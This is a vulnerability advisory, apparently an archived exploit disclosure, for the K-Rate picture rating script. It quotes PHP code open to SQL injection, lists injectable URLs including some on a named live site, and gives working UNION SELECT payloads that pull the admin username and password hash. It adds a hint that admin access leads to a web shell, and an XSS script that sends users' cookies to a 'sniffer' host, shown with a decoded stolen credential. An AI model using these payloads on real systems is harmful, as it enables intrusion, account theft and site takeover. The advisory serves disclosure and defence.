K-Rate (SQL/XSS) Multiple Remote Vulnerabilities

2009-08-28 / 2009-08-29
Credit: Corwin
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-7097 | CVE-2008-7098 | CVE-2008-7099
CWE: CWE-89
CWE-79
NVD-CWE-noinfo

============ || K-Rate SQL-INJECTION, XSS ================================================================================ Application: K-Rate ------------ Website: http://turn-k.net/k-rate -------- Demo: http://kratedemo.com ----- Version: All -------- About: K-Rate picture rating script. Price 115$. ------ Googledork: Powered by K-Rate ----------- Date: 01-07-2008 ----- Description: ------------ 1) SQL-injection 2) Active XSS 3) Passive XSS [ SOME VULNERABLE CODE ] [ admin/includes/dele_cpac.php ] $result = mysql_query("SELECT * FROM $admtable WHERE a_id=$id") or die (mysql_error()); [payments/payment_received.php] $res = mysql_query("SELECT * FROM $paytable WHERE p_id=$ord[order_id]") or die(mysql_error()); [includes/functions.php] function id_to_url($id) { global $linktable; $result = mysql_query("SELECT l_url FROM $linktable WHERE l_id=$id") or die(mysql_error()); ... if (mysql_affected_rows() == 0) { $r = mysql_query("SELECT l_cat FROM $linktable WHERE l_id=$id"); [modules/chat.php] if ($act == 'users') { $res = sql_query("SELECT * FROM $chatonlinetable LEFT JOIN $membtable ON $membtable.m_id=$chatonlinetable.co_user WHERE co_room=$room ORDER BY co_user ASC"); [ SQL-INJECTION ] *) http://host/index.php?req=online&show=1[SQL] *) http://host/room/1[SQL] *) http://raterally.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12&vote=3 *) http://raterally.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3 *) http://raterally.com/blog/somegirl[SQL] *) http://raterally.com/index.php?req=blog_edit&id=1[SQL] and other other other... ===>>> Exploit: Must be authenticated as a regular user. http://host/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/* http://host/room/-1 union select 1,version(),3,4/* http://host/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/* http://host/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/* /* Admin Login - http://host/admin Manage Templates => web-shell */ [ ACTIVE XSS ] *) in blog *) in gallery *) in forum ===>>> Exploit: <script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script> In sniff-log: YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9 Decode: <?php echo base64_decode("YToyOntzOjQ6InVzZXIiO3M6NjoiY29yd2luIjtzOjQ6InBhc3MiO3M6MzI6IjFlOGVjNTkzMGE4ODk5MmU4MDJjZDFiYWU2YzA1OWNmIjt9="); ?> Login and password (MD5): a:2:{s:4:\"user\";s:6:\"corwin\";s:4:\"pass\";s:32:\"1e8ec5930a88992e802cd1bae6c059cf\";} [ PASSIVE XSS :) ] http://host/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS] and other other bugz ... Author: Corwin ------- Contact: corwin88[dog]mail[dot]ru --------

References:

http://www.milw0rm.com/exploits/6312
http://secunia.com/advisories/31548
http://osvdb.org/48342


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top